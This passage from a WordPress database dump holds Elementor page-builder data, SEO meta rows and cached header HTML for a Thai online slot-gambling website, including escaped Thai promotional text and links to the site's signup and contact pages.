400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e15\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e19\\u0e43\\u0e08\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e40\\u0e01\\u0e21\\u0e41\\u0e25\\u0e30\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e41\\u0e25\\u0e30\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e19\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2b\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e21\\u0e32\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e08\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e04\\u0e48\\u0e41\\u0e2d\\u0e14 <\\/span><a href=\\\"http:\\/\\/luca333line.com\\\"><b>\\u0e44\\u0e25\\u0e19\\u0e4c<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e2a\\u0e2d\\u0e1a\\u0e16\\u0e32\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5bc1ff1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#FFFFFF\"},\"elements\":[{\"id\":\"12c0324a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"381c5549\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\" style=\\\"text-align: center;\\\"><span style=\\\"color: #ff6600;\\\"><a style=\\\"color: #ff6600;\\\" href=\\\"http:\\/\\/luca333.net\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><strong>Luca333<\\/strong><\\/a><\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3301,44,'_elementor_controls_usage','a:5:{s:5:\"image\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:5;s:10:\"image_size\";i:5;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:2:{s:5:\"width\";i:2;s:27:\"image_box_shadow_box_shadow\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:5;s:16:\"content_position\";i:1;s:5:\"align\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}s:14:\"section_layout\";a:2:{s:6:\"layout\";i:1;s:16:\"content_position\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:3:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:18:\"background_color_b\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:6;s:11:\"header_size\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:5:\"align\";i:6;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:9;}}}}}'),(3370,432,'_elementor_source','post'),(3371,432,'_elementor_edit_mode','builder'),(3372,432,'_elementor_template_type','header'),(3373,432,'_elementor_version','3.35.5'),(3374,432,'_elementor_pro_version','3.32.3'),(3375,432,'_wp_page_template','default'),(3376,432,'_elementor_data','[{\"id\":\"2a37657\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"50\",\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#99CC00\",\"background_color_b\":\"#FFEF2A\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"#FBFBFB\"}},\"elements\":[{\"id\":\"f229e82\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":14.7859999999999995878852132591418921947479248046875,\"_inline_size_mobile\":80},\"elements\":[{\"id\":\"265c642\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false},{\"id\":\"43121f4\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":48.546999999999997044142219237983226776123046875,\"_inline_size_tablet\":20,\"_inline_size_mobile\":20},\"elements\":[{\"id\":\"ece9e44\",\"elType\":\"widget\",\"settings\":{\"menu_name\":\"Menu\",\"menu\":\"main-menu\",\"full_width\":\"stretch\",\"color_dropdown_item\":\"#FFFFFF\",\"background_color_dropdown_item\":\"#000000\",\"background_color_dropdown_item_hover\":\"#FFFFFFBA\",\"toggle_color\":\"#FFFFFF\",\"toggle_size_mobile\":{\"unit\":\"px\",\"size\":27,\"sizes\":[]},\"align_items\":\"center\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false},{\"id\":\"4603d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":13.419000000000000483169060316868126392364501953125,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"469ae70\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\",\"link\":{\"url\":\"https:\\/\\/member.luca333.net\\/go\\/luca333\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"hover_animation\":\"shrink\",\"button_text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f2a695b\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":11.8800000000000007815970093361102044582366943359375,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"bb7db24\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\",\"link\":{\"url\":\"https:\\/\\/member.luca333.net\\/go\\/luca333\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#A30808\",\"background_color\":\"#FFFFFF\",\"button_background_hover_color\":\"#FFFFFF\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f85ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":11.3510000000000008668621376273222267627716064453125,\"_inline_size_tablet\":18},\"elements\":[{\"id\":\"5958e0a\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e32\",\"link\":{\"url\":\"http:\\/\\/luca333-line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#FFFFFF\",\"background_color\":\"#056704\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(3377,432,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(3380,32,'_elementor_controls_usage','a:5:{s:15:\"theme-site-logo\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:5;}}}}s:8:\"nav-menu\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:2:{s:10:\"full_width\";i:1;s:11:\"align_items\";i:1;}}s:5:\"style\";a:2:{s:22:\"section_style_dropdown\";a:3:{s:19:\"color_dropdown_item\";i:1;s:30:\"background_color_dropdown_item\";i:1;s:36:\"background_color_dropdown_item_hover\";i:1;}s:12:\"style_toggle\";a:1:{s:12:\"toggle_color\";i:1;}}}}s:6:\"button\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:2:{s:4:\"text\";i:3;s:4:\"link\";i:3;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:5:{s:5:\"align\";i:3;s:15:\"hover_animation\";i:3;s:17:\"button_text_color\";i:3;s:16:\"background_color\";i:2;s:29:\"button_background_hover_color\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:2:{s:6:\"layout\";i:1;s:16:\"content_position\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:3:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:18:\"background_color_b\";i:1;}s:14:\"section_border\";a:2:{s:26:\"box_shadow_box_shadow_type\";i:1;s:21:\"box_shadow_box_shadow\";i:1;}}}}}'),(3470,433,'_yoast_wpseo_meta-robots-noindex','2'),(3471,433,'_yoast_wpseo_meta-robots-nofollow','0'),(3472,433,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(3473,433,'_seopress_robots_index','no'),(3474,433,'_aioseop_noindex','off'),(3475,433,'_genesis_noindex','0'),(3476,434,'_yoast_wpseo_meta-robots-noindex','2'),(3477,434,'_yoast_wpseo_meta-robots-nofollow','0'),(3478,434,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(3479,434,'_seopress_robots_index','no'),(3480,434,'_aioseop_noindex','off'),(3481,434,'_genesis_noindex','0'),(3482,435,'_yoast_wpseo_meta-robots-noindex','2'),(3483,435,'_yoast_wpseo_meta-robots-nofollow','0'),(3484,435,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(3485,435,'_seopress_robots_index','no'),(3486,435,'_aioseop_noindex','off'),(3487,435,'_genesis_noindex','0'),(3488,436,'_yoast_wpseo_meta-robots-noindex','2'),(3489,436,'_yoast_wpseo_meta-robots-nofollow','0'),(3490,436,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(3491,436,'_seopress_robots_index','no'),(3492,436,'_aioseop_noindex','off'),(3493,436,'_genesis_noindex','0'),(3494,437,'_yoast_wpseo_meta-robots-noindex','2'),(3495,437,'_yoast_wpseo_meta-robots-nofollow','0'),(3496,437,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(3497,437,'_seopress_robots_index','no'),(3498,437,'_aioseop_noindex','off'),(3499,437,'_genesis_noindex','0'),(3500,438,'_yoast_wpseo_meta-robots-noindex','2'),(3501,438,'_yoast_wpseo_meta-robots-nofollow','0'),(3502,438,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(3503,438,'_seopress_robots_index','no'),(3504,438,'_aioseop_noindex','off'),(3505,438,'_genesis_noindex','0'),(3506,439,'_yoast_wpseo_meta-robots-noindex','2'),(3507,439,'_yoast_wpseo_meta-robots-nofollow','0'),(3508,439,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(3509,439,'_seopress_robots_index','no'),(3510,439,'_aioseop_noindex','off'),(3511,439,'_genesis_noindex','0'),(3512,440,'_yoast_wpseo_meta-robots-noindex','2'),(3513,440,'_yoast_wpseo_meta-robots-nofollow','0'),(3514,440,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(3515,440,'_seopress_robots_index','no'),(3516,440,'_aioseop_noindex','off'),(3517,440,'_genesis_noindex','0'),(3518,441,'_yoast_wpseo_meta-robots-noindex','2'),(3519,441,'_yoast_wpseo_meta-robots-nofollow','0'),(3520,441,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(3521,441,'_seopress_robots_index','no'),(3522,441,'_aioseop_noindex','off'),(3523,441,'_genesis_noindex','0'),(3524,442,'_yoast_wpseo_meta-robots-noindex','2'),(3525,442,'_yoast_wpseo_meta-robots-nofollow','0'),(3526,442,'rank_math_robots','a:1:{i:0;s:5:\"index\";}'),(3527,442,'_seopress_robots_index','no'),(3528,442,'_aioseop_noindex','off'),(3529,442,'_genesis_noindex','0'),(3571,7,'_elementor_css','a:6:{s:4:\"time\";i:1788448626;s:5:\"fonts\";a:1:{i:0;s:6:\"Prompt\";}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3572,32,'_elementor_page_assets','a:2:{s:6:\"styles\";a:3:{i:0;s:12:\"widget-image\";i:1;s:15:\"widget-nav-menu\";i:2;s:18:\"e-animation-shrink\";}s:7:\"scripts\";a:2:{i:0;s:18:\"elementor-frontend\";i:1;s:10:\"smartmenus\";}}'),(3573,435,'_elementor_page_assets','a:0:{}'),(3574,32,'_elementor_css','a:6:{s:4:\"time\";i:1788448626;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:8:\"fa-solid\";i:1;s:0:\"\";}s:20:\"dynamic_elements_ids\";a:1:{i:0;s:7:\"265c642\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3575,32,'_elementor_element_cache','{\"timeout\":1788623264,\"value\":{\"content\":\"\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-2a37657 elementor-section-full_width elementor-section-content-middle elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"2a37657\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\" data-settings=\\\"{"background_background":"gradient"}\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-20 elementor-top-column elementor-element elementor-element-f229e82\\\" data-id=\\\"f229e82\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6IjI2NWM2NDIiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJfX2R5bmFtaWNfXyI6eyJpbWFnZSI6IltlbGVtZW50b3ItdGFnIGlkPVwiXCIgbmFtZT1cInNpdGUtbG9nb1wiIHNldHRpbmdzPVwiJTdCJTdEXCJdIn19LCJlbGVtZW50cyI6W10sIndpZGdldFR5cGUiOiJ0aGVtZS1zaXRlLWxvZ28ifQ==\\\"]\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-20 elementor-top-column elementor-element elementor-element-43121f4\\\" data-id=\\\"43121f4\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6ImVjZTllNDQiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJtZW51X25hbWUiOiJNZW51IiwibWVudSI6Im1haW4tbWVudSIsImZ1bGxfd2lkdGgiOiJzdHJldGNoIiwiY29sb3JfZHJvcGRvd25faXRlbSI6IiNGRkZGRkYiLCJiYWNrZ3JvdW5kX2NvbG9yX2Ryb3Bkb3duX2l0ZW0iOiIjMDAwMDAwIiwiYmFja2dyb3VuZF9jb2xvcl9kcm9wZG93bl9pdGVtX2hvdmVyIjoiI0ZGRkZGRkJBIiwidG9nZ2xlX2NvbG9yIjoiI0ZGRkZGRiIsInRvZ2dsZV9zaXplX21vYmlsZSI6eyJ1bml0IjoicHgiLCJzaXplIjoyNywic2l6ZXMiOltdfSwiYWxpZ25faXRlbXMiOiJjZW50ZXIifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoibmF2LW1lbnUifQ==\\\"]\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-20 elementor-top-column elementor-element elementor-element-4603d33\\\" data-id=\\\"4603d33\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-469ae70 elementor-align-justify elementor-widget elementor-widget-button\\\" data-id=\\\"469ae70\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"button.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<a class=\\\"elementor-button elementor-button-link elementor-size-sm elementor-animation-shrink\\\" href=\\\"https:\\/\\/member.luca333.net\\/go\\/luca333\\\" target=\\\"_blank\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-content-wrapper\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-text\\\">\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01<\\/span>\\n\\t\\t\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t<\\/a>\\n\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-20 elementor-top-column elementor-element elementor-element-f2a695b\\\" data-id=\\\"f2a695b\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-bb7db24 elementor-align-justify elementor-widget elementor-widget-button\\\" data-id=\\\"bb7db24\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"button.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<a class=\\\"elementor-button elementor-button-link elementor-size-sm elementor-animation-shrink\\\" href=\\\"https:\\/\\/member.luca333.net\\/go\\/luca333\\\" target=\\\"_blank\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-content-wrapper\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-text\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/span>\\n\\t\\t\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t<\\/a>\\n\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-20 elementor-top-column elementor-element elementor-element-f85ac23\\\" data-id=\\\"f85ac23\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-5958e0a elementor-align-justify elementor-widget elementor-widget-button\\\" data-id=\\\"5958e0a\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"button.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<a class=\\\"elementor-button elementor-button-link elementor-size-sm elementor-animation-shrink\\\" href=\\\"http:\\/\\/luca333-line.com\\\" target=\\\"_blank\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-content-wrapper\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-text\\\">\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e32<\\/span>\\n\\t\\t\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t<\\/a>\\n\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\",\"scripts\":[],\"styles\":[]}}'),(3576,44,'_elementor_page_assets','a:2:{s:6:\"styles\";a:2:{i:0;s:12:\"widget-image\";i:1;s:14:\"widget-heading\";}s:7:\"scripts\";a:1:{i:0;s:18:\"elementor-frontend\";}}'),(3577,44,'_elementor_css','a:6:{s:4:\"time\";i:1788448746;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3578,44,'_elementor_element_cache','{\"timeout\":1788623264,\"value\":{\"content\":\"\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-e34294a elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"e34294a\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-71011f2\\\" data-id=\\\"71011f2\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-e6e2e32 elementor-widget elementor-widget-image\\\" data-id=\\\"e6e2e32\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"800\\\" height=\\\"800\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\\\" class=\\\"attachment-full size-full wp-image-363\\\" alt=\\\"AMB18\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp 800w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18-300x300.webp 300w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18-150x150.webp 150w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18-768x768.webp 768w\\\" sizes=\\\"(max-width: 800px) 100vw, 